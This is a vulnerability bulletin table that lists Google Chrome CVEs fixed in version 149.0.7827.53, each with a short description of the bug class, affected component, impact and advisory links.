| Google--Chrome | Out of bounds read in ANGLE in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11051 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498828605 |
| Google--Chrome | Type Confusion in GPU in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11052 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498834967 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11054 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498845284 |
| Google--Chrome | Use after free in ANGLE in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11055 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498881735 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11056 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498887785 |
| Google--Chrome | Uninitialized Use in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11057 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498951946 |
| Google--Chrome | Integer overflow in CredentialProvider in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to perform OS-level privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11058 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498986406 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11059 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498991983 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11060 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499018355 |
| Google--Chrome | Type Confusion in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11061 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499031961 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to inject scripts or HTML into a privileged page via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11062 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499033012 |
| Google--Chrome | Insufficient validation of untrusted input in WebNN in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11063 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499051067 |
| Google--Chrome | Race in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11064 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499075743 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11065 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499093536 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11066 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499124128 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11067 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499140183 |
| Google--Chrome | Use after free in WebSockets in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11068 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499194333 |
| Google--Chrome | Insufficient validation of untrusted input in Cast in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11069 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499213367 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the network process to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11070 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499225384 |
| Google--Chrome | Use after free in Base in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11071 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499227659 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a local attacker to execute arbitrary code via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11072 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499238195 |
| Google--Chrome | Use after free in WebGL in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11073 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499365904 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11074 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499587071 |
| Google--Chrome | Out of bounds read in V8 in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11075 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499659070 |
| Google--Chrome | Type Confusion in CSS in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11076 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499784386 |
| Google--Chrome | Bad cast in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11077 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499908918 |
| Google--Chrome | Inappropriate implementation in FileSystem in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11078 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499917177 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory write via a crafted video file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11079 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500028989 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11080 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500032538 |
| Google--Chrome | Inappropriate implementation in Canvas in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11081 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500076131 |
| Google--Chrome | Race in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11082 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500079715 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11083 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500095743 |
| Google--Chrome | Inappropriate implementation in Password Manager in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11084 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500124500 |
| Google--Chrome | Integer overflow in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11085 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500132379 |
| Google--Chrome | Inappropriate implementation in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11086 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500140111 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11087 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500140149 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11088 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500144879 |
| Google--Chrome | Uninitialized Use in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11089 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500154880 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11090 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500161302 |
| Google--Chrome | Inappropriate implementation in Dawn in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11091 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500162791 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to perform privilege escalation via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11092 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500170887 |
| Google--Chrome | Inappropriate implementation in Printing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11093 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500172365 |
| Google--Chrome | Use after free in Codecs in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11094 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500174874 |
| Google--Chrome | Insufficient validation of untrusted input in Codecs in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11095 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500293394 |
| Google--Chrome | Out of bounds read in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11096 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500296311 |
| Google--Chrome | Inappropriate implementation in WebView in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11097 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500311718 |
| Google--Chrome | Insufficient validation of untrusted input in GPU in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11098 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500315455 |
| Google--Chrome | Use after free in File Input in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11100 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500416901 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11101 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500443031 |
| Google--Chrome | Inappropriate implementation in Isolated Web Apps in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11102 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500468338 |
| Google--Chrome | Inappropriate implementation in Installer in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11103 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500483038 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11104 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500501226 |
| Google--Chrome | Insufficient validation of untrusted input in WebUI in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11105 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500505339 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11106 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500508725 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11107 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500510384 |
| Google--Chrome | Inappropriate implementation in NFC in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11108 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500517053 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11109 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500524833 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11110 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500528864 |
| Google--Chrome | Out of bounds read in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11111 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500530720 |
| Google--Chrome | Insufficient validation of untrusted input in Chromoting in Google Chrome on Linux prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11112 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500541413 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11113 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500560764 |
| Google--Chrome | Use after free in Device Trust in Google Chrome on Mac prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11114 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501360342 |
| Google--Chrome | Use after free in Updater in Google Chrome on Windows prior to 149.0.7827.53 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11115 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501370283 |
| Google--Chrome | Use after free in Chromoting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via malicious network traffic. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11116 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501376612 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11117 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501403820 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11118 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501424047 |
| Google--Chrome | Inappropriate implementation in GPU in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11119 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501461853 |
| Google--Chrome | Insufficient validation of untrusted input in Enterprise Reporting in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11120 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501467566 |
| Google--Chrome | Insufficient validation of untrusted input in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11121 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501483855 |
| Google--Chrome | Inappropriate implementation in Keyboard in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11122 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501485453 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11123 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501505198 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11124 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501511299 |
| Google--Chrome | Use after free in Compositing in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11125 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501517520 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.53 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11126 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501528031 |
| Google--Chrome | Inappropriate implementation in WebAPKs in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker to perform domain spoofing via a crafted WebAPK. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11127 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501535295 |
| Google--Chrome | Inappropriate implementation in Web Share in Google Chrome prior to 149.0.7827.53 allowed a remote attacker who convinced a user to engage in specific UI gestures to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11128 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501541341 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11129 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501541962 |
| Google--Chrome | Use after free in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11130 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501546443 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Android prior to 149.0.7827.53 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11131 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501561644 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11132 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501597365 |
| Google--Chrome | Insufficient policy enforcement in Paint in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11133 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501606085 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11134 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501640084 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11135 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501644835 |
| Google--Chrome | Use after free in Canvas in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11136 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501646327 |
| Google--Chrome | Uninitialized Use in ANGLE in Google Chrome prior to 149.0.7827.53 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-04 | not yet calculated | CVE-2026-11137 | https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501647943 |
